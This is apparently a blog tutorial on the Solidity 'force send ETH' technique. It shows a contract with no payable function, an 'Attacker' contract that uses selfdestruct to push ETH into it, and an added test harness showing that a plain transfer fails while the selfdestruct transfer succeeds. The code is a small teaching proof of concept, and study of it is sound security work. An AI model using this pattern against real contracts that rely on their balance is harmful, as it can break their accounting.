May 14, 2022 08:18 pm GMT

Force Send ETH - 1

This vulnerability stems from a well-known Solidity feature:

selfdestruct(payable(addressThat)) sends all the ETH held by a contract to another contract at addressThat. selfdestruct is an EVM-level operation that clears all data from the contract and frees up space on the blockchain.

It is also considerably cheaper than addressThat.send(address(this).balance) for sending all ETH to another contract.

Let's see this with an example:

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

contract dontWant {
    // No payable function, hence it can't receive ETH through a normal transfer
    function something() external pure returns (uint) {
        return 1;
    }

    function getBalance() external view returns (uint) {
        return address(this).balance;
    }
}
```

Attacker:

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

contract Attacker {
    // We will send ether to this contract
    receive() external payable {}

    // This contract will forcefully send all its ether to dontWant
    function attack(address _dontWant) external payable {
        selfdestruct(payable(_dontWant));
    }

    function getBalance() external view returns (uint) {
        return address(this).balance;
    }
}
```

When we send some ETH to the Attacker contract and call the attack() function, dontWant receives the ETH.
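The difference between an ordinary transfer and a selfdestruct transfer can be checked in a single transaction. The following is an added example, not code from the original article: NoReceive stands in for dontWant, and Carrier and ForceSendCheck are hypothetical names.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

// Added example. NoReceive mirrors dontWant; Carrier and ForceSendCheck
// are hypothetical helper names. Newer compilers warn that selfdestruct
// is deprecated, but the code still compiles.
contract NoReceive {
    // No receive(), fallback() or payable function.
    function getBalance() external view returns (uint256) {
        return address(this).balance;
    }
}

contract Carrier {
    constructor() payable {}

    function destroy(address payable to) external {
        // Credits this contract's whole balance to `to` without running code there.
        selfdestruct(to);
    }
}

contract ForceSendCheck {
    // Call with at least 2 wei. Returns whether the plain transfer succeeded
    // and the target's balance before and after the selfdestruct.
    function run() external payable
        returns (bool plainOk, uint256 balBefore, uint256 balAfter)
    {
        require(msg.value >= 2, "send at least 2 wei");
        NoReceive target = new NoReceive();
        uint256 half = msg.value / 2;

        // 1. Ordinary transfer: rejected, target has no payable entry point.
        (plainOk, ) = address(target).call{value: half}("");
        balBefore = address(target).balance; // still 0

        // 2. selfdestruct: balance is credited although target cannot accept ETH.
        Carrier carrier = new Carrier{value: half}();
        carrier.destroy(payable(address(target)));
        balAfter = address(target).balance; // equals half

        assert(!plainOk && balBefore == 0 && balAfter == half);
        // Refund whatever was not moved into target (the caller must accept ETH).
        payable(msg.sender).transfer(address(this).balance);
    }
}
```

Calling run() from an externally owned account with a few wei returns plainOk = false, balBefore = 0 and balAfter equal to half of the value sent.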

Any contract can send ETH to any other contract using selfdestruct, even if the receiving contract has no receive or fallback function.
But why is this a vulnerability in the first place? What's wrong with receiving free ETH?
These questions are answered in the next post (Force Send ETH - 2).


Original Link: https://dev.to/rushanksavant/force-send-eth-1-2on1
